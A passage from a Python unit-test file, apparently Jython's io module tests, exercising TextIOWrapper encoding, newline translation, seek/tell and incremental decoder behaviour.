# I=0, O=0 (should ignore extra periods)
(b'oi...abcd...', True, 'abcd.'),
# I=0, O=6 (variable-length input, fixed-length output)
(b'i.o6.x.xyz.toolongtofit.', False, 'x-----.xyz---.toolon.'),
# I=2, O=6 (fixed-length input < fixed-length output)
(b'i.i2.o6xyz', True, 'xy----.z-----.'),
# I=6, O=3 (fixed-length input > fixed-length output)
(b'i.o3.i6.abcdefghijklmnop', True, 'abc.ghi.mno.'),
# I=0, then 3; O=29, then 15 (with longer output)
(b'i.o29.a.b.cde.o15.abcdefghijabcdefghij.i3.a.b.c.d.ei00k.l.m', True,
'a----------------------------.' +
'b----------------------------.' +
'cde--------------------------.' +
'abcdefghijabcde.' +
'a.b------------.' +
'.c.------------.' +
'd.e------------.' +
'k--------------.' +
'l--------------.' +
'm--------------.')
]
def test_decoder(self):
# Try a few one-shot test cases.
for input, eof, output in self.test_cases:
d = StatefulIncrementalDecoder()
self.assertEqual(d.decode(input, eof), output)
# Also test an unfinished decode, followed by forcing EOF.
d = StatefulIncrementalDecoder()
self.assertEqual(d.decode(b'oiabcd'), '')
self.assertEqual(d.decode(b'', 1), 'abcd.')
class TextIOWrapperTest(unittest.TestCase):
def setUp(self):
self.testdata = b"AAA\r\nBBB\rCCC\r\nDDD\nEEE\r\n"
self.normalized = b"AAA\nBBB\nCCC\nDDD\nEEE\n".decode("ascii")
support.unlink(support.TESTFN)
def tearDown(self):
support.unlink(support.TESTFN)
def test_constructor(self):
r = self.BytesIO(b"\xc3\xa9\n\n")
b = self.BufferedReader(r, 1000)
t = self.TextIOWrapper(b)
t.__init__(b, encoding="latin1", newline="\r\n")
self.assertEqual(t.encoding, "latin1")
self.assertEqual(t.line_buffering, False)
t.__init__(b, encoding="utf8", line_buffering=True)
self.assertEqual(t.encoding, "utf8")
self.assertEqual(t.line_buffering, True)
self.assertEqual("\xe9\n", t.readline())
self.assertRaises(TypeError, t.__init__, b, newline=42)
self.assertRaises(ValueError, t.__init__, b, newline='xyzzy')
def test_detach(self):
r = self.BytesIO()
b = self.BufferedWriter(r)
t = self.TextIOWrapper(b)
self.assertIs(t.detach(), b)
t = self.TextIOWrapper(b, encoding="ascii")
t.write("howdy")
self.assertFalse(r.getvalue())
t.detach()
self.assertEqual(r.getvalue(), b"howdy")
self.assertRaises(ValueError, t.detach)
def test_repr(self):
raw = self.BytesIO("hello".encode("utf-8"))
b = self.BufferedReader(raw)
t = self.TextIOWrapper(b, encoding="utf-8")
modname = self.TextIOWrapper.__module__
self.assertEqual(repr(t),
"<%s.TextIOWrapper encoding='utf-8'>" % modname)
raw.name = "dummy"
self.assertEqual(repr(t),
"<%s.TextIOWrapper name=u'dummy' encoding='utf-8'>" % modname)
raw.name = b"dummy"
self.assertEqual(repr(t),
"<%s.TextIOWrapper name='dummy' encoding='utf-8'>" % modname)
def test_line_buffering(self):
r = self.BytesIO()
b = self.BufferedWriter(r, 1000)
t = self.TextIOWrapper(b, newline="\n", line_buffering=True)
t.write("X")
self.assertEqual(r.getvalue(), b"") # No flush happened
t.write("Y\nZ")
self.assertEqual(r.getvalue(), b"XY\nZ") # All got flushed
t.write("A\rB")
self.assertEqual(r.getvalue(), b"XY\nZA\rB")
def test_encoding(self):
# Check the encoding attribute is always set, and valid
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="utf8")
self.assertEqual(t.encoding, "utf8")
t = self.TextIOWrapper(b)
self.assertTrue(t.encoding is not None)
codecs.lookup(t.encoding)
def test_encoding_errors_reading(self):
# (1) default
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii")
self.assertRaises(UnicodeError, t.read)
# (2) explicit strict
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="strict")
self.assertRaises(UnicodeError, t.read)
# (3) ignore
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="ignore")
self.assertEqual(t.read(), "abc\n\n")
# (4) replace
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="replace")
self.assertEqual(t.read(), "abc\n\ufffd\n")
def test_encoding_errors_writing(self):
# (1) default
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii")
self.assertRaises(UnicodeError, t.write, "\xff")
# (2) explicit strict
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="strict")
self.assertRaises(UnicodeError, t.write, "\xff")
# (3) ignore
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="ignore",
newline="\n")
t.write("abc\xffdef\n")
t.flush()
self.assertEqual(b.getvalue(), b"abcdef\n")
# (4) replace
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="replace",
newline="\n")
t.write("abc\xffdef\n")
t.flush()
self.assertEqual(b.getvalue(), b"abc?def\n")
def test_newlines(self):
input_lines = [ "unix\n", "windows\r\n", "os9\r", "last\n", "nonl" ]
tests = [
[ None, [ 'unix\n', 'windows\n', 'os9\n', 'last\n', 'nonl' ] ],
[ '', input_lines ],
[ '\n', [ "unix\n", "windows\r\n", "os9\rlast\n", "nonl" ] ],
[ '\r\n', [ "unix\nwindows\r\n", "os9\rlast\nnonl" ] ],
[ '\r', [ "unix\nwindows\r", "\nos9\r", "last\nnonl" ] ],
]
encodings = (
'utf-8', 'latin-1',
'utf-16', 'utf-16-le', 'utf-16-be',
'utf-32', 'utf-32-le', 'utf-32-be',
)
# Try a range of buffer sizes to test the case where \r is the last
# character in TextIOWrapper._pending_line.
for encoding in encodings:
# XXX: str.encode() should return bytes
data = bytes(''.join(input_lines).encode(encoding))
for do_reads in (False, True):
for bufsize in range(1, 10):
for newline, exp_lines in tests:
bufio = self.BufferedReader(self.BytesIO(data), bufsize)
textio = self.TextIOWrapper(bufio, newline=newline,
encoding=encoding)
if do_reads:
got_lines = []
while True:
c2 = textio.read(2)
if c2 == '':
break
self.assertEqual(len(c2), 2)
got_lines.append(c2 + textio.readline())
else:
got_lines = list(textio)
for got_line, exp_line in zip(got_lines, exp_lines):
self.assertEqual(got_line, exp_line)
self.assertEqual(len(got_lines), len(exp_lines))
def test_newlines_input(self):
testdata = b"AAA\nBB\x00B\nCCC\rDDD\rEEE\r\nFFF\r\nGGG"
normalized = testdata.replace(b"\r\n", b"\n").replace(b"\r", b"\n")
for newline, expected in [
(None, normalized.decode("ascii").splitlines(True)),
("", testdata.decode("ascii").splitlines(True)),
("\n", ["AAA\n", "BB\x00B\n", "CCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
("\r\n", ["AAA\nBB\x00B\nCCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
("\r", ["AAA\nBB\x00B\nCCC\r", "DDD\r", "EEE\r", "\nFFF\r", "\nGGG"]),
]:
buf = self.BytesIO(testdata)
txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline)
self.assertEqual(txt.readlines(), expected)
txt.seek(0)
self.assertEqual(txt.read(), "".join(expected))
def test_newlines_output(self):
testdict = {
"": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
"\n": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
"\r": b"AAA\rBBB\rCCC\rX\rY\r\rZ",
"\r\n": b"AAA\r\nBBB\r\nCCC\r\nX\rY\r\r\nZ",
}
tests = [(None, testdict[os.linesep])] + sorted(testdict.items())
for newline, expected in tests:
buf = self.BytesIO()
txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline)
txt.write("AAA\nB")
txt.write("BB\nCCC\n")
txt.write("X\rY\r\nZ")
txt.flush()
self.assertEqual(buf.closed, False)
self.assertEqual(buf.getvalue(), expected)
@unittest.skipIf(support.is_jython, "GC nondeterministic in Jython")
def test_destructor(self):
l = []
base = self.BytesIO
class MyBytesIO(base):
def close(self):
l.append(self.getvalue())
base.close(self)
b = MyBytesIO()
t = self.TextIOWrapper(b, encoding="ascii")
t.write("abc")
del t
support.gc_collect()
self.assertEqual([b"abc"], l)
@unittest.skipIf(support.is_jython, "GC nondeterministic in Jython")
def test_override_destructor(self):
record = []
class MyTextIO(self.TextIOWrapper):
def __del__(self):
record.append(1)
try:
f = super(MyTextIO, self).__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super(MyTextIO, self).close()
def flush(self):
record.append(3)
super(MyTextIO, self).flush()
b = self.BytesIO()
t = MyTextIO(b, encoding="ascii")
del t
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_error_through_destructor(self):
# Test that the exception state is not modified by a destructor,
# even if close() fails.
rawio = self.CloseFailureIO()
def f():
self.TextIOWrapper(rawio).xyzzy
with support.captured_output("stderr") as s:
self.assertRaises(AttributeError, f)
s = s.getvalue().strip()
if s:
# The destructor *may* have printed an unraisable error, check it
self.assertEqual(len(s.splitlines()), 1)
self.assertTrue(s.startswith("Exception IOError: "), s)
self.assertTrue(s.endswith(" ignored"), s)
# Systematic tests of the text I/O API
def test_basic_io(self):
for chunksize in (1, 2, 3, 4, 5, 15, 16, 17, 31, 32, 33, 63, 64, 65):
for enc in "ascii", "latin1", "utf8" :# , "utf-16-be", "utf-16-le":
f = self.open(support.TESTFN, "w+", encoding=enc)
f._CHUNK_SIZE = chunksize
self.assertEqual(f.write("abc"), 3)
f.close()
f = self.open(support.TESTFN, "r+", encoding=enc)
f._CHUNK_SIZE = chunksize
self.assertEqual(f.tell(), 0)
self.assertEqual(f.read(), "abc")
cookie = f.tell()
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.read(None), "abc")
f.seek(0)
self.assertEqual(f.read(2), "ab")
self.assertEqual(f.read(1), "c")
self.assertEqual(f.read(1), "")
self.assertEqual(f.read(), "")
self.assertEqual(f.tell(), cookie)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.seek(0, 2), cookie)
self.assertEqual(f.write("def"), 3)
self.assertEqual(f.seek(cookie), cookie)
self.assertEqual(f.read(), "def")
if enc.startswith("utf"):
self.multi_line_test(f, enc)
f.close()
def multi_line_test(self, f, enc):
f.seek(0)
f.truncate()
sample = "s\xff\u0fff\uffff"
wlines = []
for size in (0, 1, 2, 3, 4, 5, 30, 31, 32, 33, 62, 63, 64, 65, 1000):
chars = []
for i in range(size):
chars.append(sample[i % len(sample)])
line = "".join(chars) + "\n"
wlines.append((f.tell(), line))
f.write(line)
f.seek(0)
rlines = []
while True:
pos = f.tell()
line = f.readline()
if not line:
break
rlines.append((pos, line))
self.assertEqual(rlines, wlines)
def test_telling(self):
f = self.open(support.TESTFN, "w+", encoding="utf8")
p0 = f.tell()
f.write("\xff\n")
p1 = f.tell()
f.write("\xff\n")
p2 = f.tell()
f.seek(0)
self.assertEqual(f.tell(), p0)
self.assertEqual(f.readline(), "\xff\n")
self.assertEqual(f.tell(), p1)
self.assertEqual(f.readline(), "\xff\n")
self.assertEqual(f.tell(), p2)
f.seek(0)
for line in f:
self.assertEqual(line, "\xff\n")
self.assertRaises(IOError, f.tell)
self.assertEqual(f.tell(), p2)
f.close()
def test_seeking(self):
chunk_size = _default_chunk_size()
prefix_size = chunk_size - 2
u_prefix = "a" * prefix_size
prefix = bytes(u_prefix.encode("utf-8"))
self.assertEqual(len(u_prefix), len(prefix))
u_suffix = "\u8888\n"
suffix = bytes(u_suffix.encode("utf-8"))
line = prefix + suffix
f = self.open(support.TESTFN, "wb")
f.write(line*2)
f.close()
f = self.open(support.TESTFN, "r", encoding="utf-8")
s = f.read(prefix_size)
self.assertEqual(s, prefix.decode("ascii"))
self.assertEqual(f.tell(), prefix_size)
self.assertEqual(f.readline(), u_suffix)
def test_seeking_too(self):
# Regression test for a specific bug
data = b'\xe0\xbf\xbf\n'
f = self.open(support.TESTFN, "wb")
f.write(data)
f.close()
f = self.open(support.TESTFN, "r", encoding="utf-8")
f._CHUNK_SIZE # Just test that it exists
f._CHUNK_SIZE = 2
f.readline()
f.tell()
def test_seek_and_tell(self):
#Test seek/tell using the StatefulIncrementalDecoder.
# Make test faster by doing smaller seeks
CHUNK_SIZE = 128
def test_seek_and_tell_with_data(data, min_pos=0):
"""Tell/seek to various points within a data stream and ensure
that the decoded data returned by read() is consistent."""
f = self.open(support.TESTFN, 'wb')
f.write(data)
f.close()
f = self.open(support.TESTFN, encoding='test_decoder')
f._CHUNK_SIZE = CHUNK_SIZE
decoded = f.read()
f.close()
for i in range(min_pos, len(decoded) + 1): # seek positions
for j in [1, 5, len(decoded) - i]: # read lengths
f = self.open(support.TESTFN, encoding='test_decoder')
self.assertEqual(f.read(i), decoded[:i])
cookie = f.tell()
self.assertEqual(f.read(j), decoded[i:i + j])
f.seek(cookie)
self.assertEqual(f.read(), decoded[i:])
f.close()
# Enable the test decoder.
StatefulIncrementalDecoder.codecEnabled = 1
# Run the tests.
try:
# Try each test case.
for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
test_seek_and_tell_with_data(input)
# Position each test case so that it crosses a chunk boundary.
for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
offset = CHUNK_SIZE - len(input)//2
prefix = b'.'*offset
# Don't bother seeking into the prefix (takes too long).
min_pos = offset*2
test_seek_and_tell_with_data(prefix + input, min_pos)
# Ensure our test decoder won't interfere with subsequent tests.
finally:
StatefulIncrementalDecoder.codecEnabled = 0
def test_encoded_writes(self):
data = "1234567890"
tests = ("utf-16",
"utf-16-le",
"utf-16-be",
"utf-32",
"utf-32-le",
"utf-32-be")
for encoding in tests:
buf = self.BytesIO()
f = self.TextIOWrapper(buf, encoding=encoding)
# Check if the BOM is written only once (see issue1753).
f.write(data)
f.write(data)
f.seek(0)
self.assertEqual(f.read(), data * 2)
f.seek(0)
self.assertEqual(f.read(), data * 2)
self.assertEqual(buf.getvalue(), (data * 2).encode(encoding))
def test_unreadable(self):
class UnReadable(self.BytesIO):
def readable(self):
return False
txt = self.TextIOWrapper(UnReadable())
self.assertRaises(IOError, txt.read)
def test_read_one_by_one(self):
txt = self.TextIOWrapper(self.BytesIO(b"AA\r\nBB"))
reads = ""
while True:
c = txt.read(1)
if not c:
break
reads += c
self.assertEqual(reads, "AA\nBB")
def test_readlines(self):
txt = self.TextIOWrapper(self.BytesIO(b"AA\nBB\nCC"))
self.assertEqual(txt.readlines(), ["AA\n", "BB\n", "CC"])
txt.seek(0)
self.assertEqual(txt.readlines(None), ["AA\n", "BB\n", "CC"])
txt.seek(0)
self.assertEqual(txt.readlines(5), ["AA\n", "BB\n"])
# read in amounts equal to TextIOWrapper._CHUNK_SIZE which is 128.
def test_read_by_chunk(self):
# make sure "\r\n" straddles 128 char boundary.
txt = self.TextIOWrapper(self.BytesIO(b"A" * 127 + b"\r\nB"))
reads = ""
while True:
c = txt.read(128)
if not c:
break
reads += c
self.assertEqual(reads, "A"*127+"\nB")
def test_writelines(self):
l = ['ab', 'cd', 'ef']
buf = self.BytesIO()
txt = self.TextIOWrapper(buf)
txt.writelines(l)
txt.flush()
self.assertEqual(buf.getvalue(), b'abcdef')
def test_writelines_userlist(self):
l = UserList(['ab', 'cd', 'ef'])
buf = self.BytesIO()
txt = self.TextIOWrapper(buf)
txt.writelines(l)
txt.flush()
self.assertEqual(buf.getvalue(), b'abcdef')
def test_writelines_error(self):
txt = self.TextIOWrapper(self.BytesIO())
self.assertRaises(TypeError, txt.writelines, [1, 2, 3])
self.assertRaises(TypeError, txt.writelines, None)
self.assertRaises(TypeError, txt.writelines, b'abc')
def test_issue1395_1(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
# read one char at a time
reads = ""
while True:
c = txt.read(1)
if not c:
break
reads += c
self.assertEqual(reads, self.normalized)
def test_issue1395_2(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = ""
while True:
c = txt.read(4)
if not c:
break
reads += c
self.assertEqual(reads, self.normalized)
def test_issue1395_3(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
reads += txt.read(4)
reads += txt.readline()
reads += txt.readline()
reads += txt.readline()
self.assertEqual(reads, self.normalized)
def test_issue1395_4(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
reads += txt.read()
self.assertEqual(reads, self.normalized)
def test_issue1395_5(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
pos = txt.tell()
txt.seek(0)
txt.seek(pos)
self.assertEqual(txt.read(4), "BBB\n")
def test_issue2282(self):
buffer = self.BytesIO(self.testdata)
txt = self.TextIOWrapper(buffer, encoding="ascii")
self.assertEqual(buffer.seekable(), txt.seekable())
def test_append_bom(self):
# The BOM is not written again when appending to a non-empty file
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
pos = f.tell()
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaa'.encode(charset))
with self.open(filename, 'a', encoding=charset) as f:
f.write('xxx')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaaxxx'.encode(charset))
def test_seek_bom(self):
# Same test, but when seeking manually
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
pos = f.tell()
with self.open(filename, 'r+', encoding=charset) as f:
f.seek(pos)
f.write('zzz')
f.seek(0)
f.write('bbb')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'bbbzzz'.encode(charset))
def test_errors_property(self):
with self.open(support.TESTFN, "w") as f:
self.assertEqual(f.errors, "strict")
with self.open(support.TESTFN, "w", errors="replace") as f:
self.assertEqual(f.errors, "replace")
@unittest.skipUnless(threading, 'Threading required for this test.')
@unittest.skipIf(support.is_jython, "Not thread-safe: Jython issue 2588.")
def test_threads_write(self):
# Issue6750: concurrent writes could duplicate data
event = threading.Event()
with self.open(support.TESTFN, "w", buffering=1) as f:
def run(n):
text = "Thread%03d\n" % n
event.wait()
f.write(text)
threads = [threading.Thread(target=lambda n=x: run(n))
for x in range(20)]
for t in threads:
t.start()
time.sleep(0.02)
event.set()
for t in threads:
t.join()
with self.open(support.TESTFN) as f:
content = f.read()
for n in range(20):
self.assertEqual(content.count("Thread%03d\n" % n), 1)
def test_flush_error_on_close(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
def bad_flush():
raise IOError()
txt.flush = bad_flush
self.assertRaises(IOError, txt.close) # exception not swallowed
self.assertTrue(txt.closed)
def test_multi_close(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt.close()
txt.close()
txt.close()
self.assertRaises(ValueError, txt.flush)
def test_readonly_attributes(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
buf = self.BytesIO(self.testdata)
with self.assertRaises((AttributeError, TypeError)):
txt.buffer = buf
def test_read_nonbytes(self):
# Issue #17106
# Crash when underlying read() returns non-bytes
class NonbytesStream(self.StringIO):
read1 = self.StringIO.read
class NonbytesStream(self.StringIO):
read1 = self.StringIO.read
t = self.TextIOWrapper(NonbytesStream('a'))
with self.maybeRaises(TypeError):
t.read(1)
t = self.TextIOWrapper(NonbytesStream('a'))
with self.maybeRaises(TypeError):
t.readline()
t = self.TextIOWrapper(NonbytesStream('a'))
with self.maybeRaises(TypeError):
# Jython difference: also detect the error in
t.read()
def test_illegal_decoder(self):
# Issue #17106
# Crash when decoder returns non-string
t = self.TextIOWrapper(self.BytesIO(b'aaaaaa'), newline='\n',
encoding='quopri_codec')
with self.maybeRaises(TypeError):
t.read(1)
t = self.TextIOWrapper(self.BytesIO(b'aaaaaa'), newline='\n',
encoding='quopri_codec')
with self.maybeRaises(TypeError):
t.readline()
t = self.TextIOWrapper(self.BytesIO(b'aaaaaa'), newline='\n',
encoding='quopri_codec')
with self.maybeRaises(TypeError):
t.read()
class CTextIOWrapperTest(TextIOWrapperTest):
def test_initialization(self):
# Use ascii material so decoding does not raise ValueError
r = self.BytesIO(b"red\nherring\n")
b = self.BufferedReader(r, 1000)
t = self.TextIOWrapper(b)
# Jython note: Invalid __init__ calls also leave t unreadable (in C
# implementation but not pure python _pyio).
self.assertRaises(TypeError, t.__init__, b, newline=42)
self.assertRaises(ValueError, t.read) # Check t unreadable
self.assertRaises(ValueError, t.__init__, b, newline='xyzzy')
self.assertRaises(ValueError, t.read) # Check t unreadable
@unittest.skipIf(support.is_jython, "GC nondeterministic in Jython")
def test_garbage_collection(self):
# C TextIOWrapper objects are collected, and collecting them flushes
# all data to disk.
# The Python version has __del__, so it ends in gc.garbage instead.
rawio = io.FileIO(support.TESTFN, "wb")
b = self.BufferedWriter(rawio)
t = self.TextIOWrapper(b, encoding="ascii")
t.write("456def")
t.x = t
wr = weakref.ref(t)
del t
support.gc_collect()
self.assertTrue(wr() is None, wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"456def")
@unittest.skipIf(support.is_jython, "GC nondeterministic in Jython")
def test_rwpair_cleared_before_textio(self):
# Issue 13070: TextIOWrapper's finalization would crash when called
# after the reference to the underlying BufferedRWPair's writer got
# cleared by the GC.
for i in range(1000):
b1 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())
t1 = self.TextIOWrapper(b1, encoding="ascii")
b2 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())
t2 = self.TextIOWrapper(b2, encoding="ascii")
# circular references
t1.buddy = t2
t2.buddy = t1
support.gc_collect()
maybeRaises = unittest.TestCase.assertRaises
class PyTextIOWrapperTest(TextIOWrapperTest):
@contextlib.contextmanager
def maybeRaises(self, *args, **kwds):
yield
class IncrementalNewlineDecoderTest(unittest.TestCase):
def check_newline_decoding_utf8(self, decoder):
# UTF-8 specific tests for a newline decoder
def _check_decode(b, s, **kwargs):
# We exercise getstate() / setstate() as well as decode()
state = decoder.getstate()
self.assertEqual(decoder.decode(b, **kwargs), s)
decoder.setstate(state)
self.assertEqual(decoder.decode(b, **kwargs), s)
_check_decode(b'\xe8\xa2\x88', "\u8888")
_check_decode(b'\xe8', "")
_check_decode(b'\xa2', "")
_check_decode(b'\x88', "\u8888")
_check_decode(b'\xe8', "")
_check_decode(b'\xa2', "")
_check_decode(b'\x88', "\u8888")
_check_decode(b'\xe8', "")
self.assertRaises(UnicodeDecodeError, decoder.decode, b'', final=True)
decoder.reset()
_check_decode(b'\n', "\n")
_check_decode(b'\r', "")
_check_decode(b'', "\n", final=True)
_check_decode(b'\r', "\n", final=True)
_check_decode(b'\r', "")
_check_decode(b'a', "\na")
_check_decode(b'\r\r\n', "\n\n")
_check_decode(b'\r', "")
_check_decode(b'\r', "\n")
_check_decode(b'\na', "\na")
_check_decode(b'\xe8\xa2\x88\r\n', "\u8888\n")
_check_decode(b'\xe8\xa2\x88', "\u8888")
_check_decode(b'\n', "\n")
_check_decode(b'\xe8\xa2\x88\r', "\u8888")
_check_decode(b'\n', "\n")
def check_newline_decoding(self, decoder, encoding):
result = []
if encoding is not None:
encoder = codecs.getincrementalencoder(encoding)()
def _decode_bytewise(s):
# Decode one byte at a time
for b in encoder.encode(s):
result.append(decoder.decode(b))
else:
encoder = None
def _decode_bytewise(s):
# Decode one char at a time
for c in s:
result.append(decoder.decode(c))
self.assertEqual(decoder.newlines, None)
_decode_bytewise("abc\n\r")
self.assertEqual(decoder.newlines, '\n')
_decode_bytewise("\nabc")
self.assertEqual(decoder.newlines, ('\n', '\r\n'))
_decode_bytewise("abc\r")
self.assertEqual(decoder.newlines, ('\n', '\r\n'))
_decode_bytewise("abc")
self.assertEqual(decoder.newlines, ('\r', '\n', '\r\n'))
_decode_bytewise("abc\r")
self.assertEqual("".join(result), "abc\n\nabcabc\nabcabc")
decoder.reset()
input = "abc"
if encoder is not None:
encoder.reset()
input = encoder.encode(input)
self.assertEqual(decoder.decode(input), "abc")
self.assertEqual(decoder.newlines, None)
def test_newline_decoder(self):
encodings = (
# None meaning the IncrementalNewlineDecoder takes unicode input
# rather than bytes input
None, 'utf-8', 'latin-1',
'utf-16', 'utf-16-le', 'utf-16-be',
'utf-32', 'utf-32-le', 'utf-32-be',
)
for enc in encodings:
decoder = enc and codecs.getincrementaldecoder(enc)()
decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
self.check_newline_decoding(decoder, enc)
decoder = codecs.getincrementaldecoder("utf-8")()
decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
self.check_newline_decoding_utf8(decoder)
def test_newline_bytes(self):
# Issue 5433: Excessive optimization in IncrementalNewlineDecoder
def _check(dec):
self.assertEqual(dec.newlines, None)
self.assertEqual(dec.decode("\u0D00"), "\u0D00")
self.assertEqual(dec.newlines, None)
self.assertEqual(dec.decode("\u0A00"), "\u0A00")
self.assertEqual(dec.newlines, None)
dec = self.IncrementalNewlineDecoder(None, translate=False)
_check(dec)
dec = self.IncrementalNewlineDecoder(None, translate=True)
_check(dec)
class CIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
pass
class PyIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
pass
# XXX Tests for open()
class MiscIOTest(unittest.TestCase):
def tearDown(self):
support.unlink(support.TESTFN)
def test___all__(self):
for name in self.io.__all__:
obj = getattr(self.io, name, None)
self.assertTrue(obj is not None, name)
if name == "open":
continue
elif "error" in name.lower() or name == "UnsupportedOperation":
self.assertTrue(issubclass(obj, Exception), name)
elif not name.startswith("SEEK_"):
self.assertTrue(issubclass(obj, self.IOBase))
def test_attributes(self):
f = self.open(support.TESTFN, "wb", buffering=0)
self.assertEqual(f.mode, "wb")
f.close()
f = self.open(support.TESTFN, "U")
self.assertEqual(f.name, support.TESTFN)
self.assertEqual(f.buffer.name, support.TESTFN)
self.assertEqual(f.buffer.raw.name, support.TESTFN)
self.assertEqual(f.mode, "U")
self.assertEqual(f.buffer.mode, "rb")
self.assertEqual(f.buffer.raw.mode, "rb")
f.close()
f = self.open(support.TESTFN, "w+")
self.assertEqual(f.mode, "w+")
self.assertEqual(f.buffer.mode, "rb+") # Does it really matter?
self.assertEqual(f.buffer.raw.mode, "rb+")
g = self.open(f.fileno(), "wb", closefd=False)
self.assertEqual(g.mode, "wb")
self.assertEqual(g.raw.mode, "wb")
self.assertEqual(g.name, f.fileno())
self.assertEqual(g.raw.name, f.fileno())
g.close() # Jython difference: close g first (which may flush) ...
f.close() # Jython difference: then close f, which closes the fd
def test_io_after_close(self):
for kwargs in [
{"mode": "w"},
{"mode": "wb"},
{"mode": "w", "buffering": 1},
{"mode": "w", "buffering": 2},
{"mode": "wb", "buffering": 0},
{"mode": "r"},
{"mode": "rb"},
{"mode": "r", "buffering": 1},
{"mode": "r", "buffering": 2},
{"mode": "rb", "buffering": 0},
{"mode": "w+"},
{"mode": "w+b"},
{"mode": "w+", "buffering": 1},
{"mode": "w+", "buffering": 2},
{"mode": "w+b", "buffering": 0},
]:
f = self.open(support.TESTFN, **kwargs)
f.close()
self.assertRaises(ValueError, f.flush)
self.assertRaises(ValueError, f.fileno)
self.assertRaises(ValueError, f.isatty)
self.assertRaises(ValueError, f.__iter__)
if hasattr(f, "peek"):
self.assertRaises(ValueError, f.peek, 1)
self.assertRaises(ValueError, f.read)
if hasattr(f, "read1"):
self.assertRaises(ValueError, f.read1, 1024)
if hasattr(f, "readall"):
self.assertRaises(ValueError, f.readall)
if hasattr(f, "readinto"):
self.assertRaises(ValueError, f.readinto, bytearray(1024))
self.assertRaises(ValueError, f.readline)
self.assertRaises(ValueError, f.readlines)
self.assertRaises(ValueError, f.seek, 0)
self.assertRaises(ValueError, f.tell)
self.assertRaises(ValueError, f.truncate)
self.assertRaises(ValueError, f.write,
b"" if "b" in kwargs['mode'] else "")
self.assertRaises(ValueError, f.writelines, [])
self.assertRaises(ValueError, next, f)
@unittest.skipIf(support.is_jython, "GC nondeterministic in Jython")
def test_blockingioerror(self):
# Various BlockingIOError issues
self.assertRaises(TypeError, self.BlockingIOError)
self.assertRaises(TypeError, self.BlockingIOError, 1)
self.assertRaises(TypeError, self.BlockingIOError, 1, 2, 3, 4)
self.assertRaises(TypeError, self.BlockingIOError, 1, "", None)
b = self.BlockingIOError(1, "")
self.assertEqual(b.characters_written, 0)
class C(unicode):
pass
c = C("")
b = self.BlockingIOError(1, c)
c.b = b
b.c = c
wr = weakref.ref(c)
del c, b
support.gc_collect()
self.assertTrue(wr() is None, wr)
def test_abcs(self):
# Test the visible base classes are ABCs.
self.assertIsInstance(self.IOBase, abc.ABCMeta)
self.assertIsInstance(self.RawIOBase, abc.ABCMeta)
self.assertIsInstance(self.BufferedIOBase, abc.ABCMeta)
self.assertIsInstance(self.TextIOBase, abc.ABCMeta)
def _check_abc_inheritance(self, abcmodule):
with self.open(support.TESTFN, "wb", buffering=0) as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertIsInstance(f, abcmodule.RawIOBase)
self.assertNotIsInstance(f, abcmodule.BufferedIOBase)
self.assertNotIsInstance(f, abcmodule.TextIOBase)
with self.open(support.TESTFN, "wb") as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertNotIsInstance(f, abcmodule.RawIOBase)
self.assertIsInstance(f, abcmodule.BufferedIOBase)
self.assertNotIsInstance(f, abcmodule.TextIOBase)
with self.open(support.TESTFN, "w") as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertNotIsInstance(f, abcmodule.RawIOBase)
self.assertNotIsInstance(f, abcmodule.BufferedIOBase)
self.assertIsInstance(f, abcmodule.TextIOBase)
def test_abc_inheritance(self):
# Test implementations inherit from their respective ABCs
self._check_abc_inheritance(self)
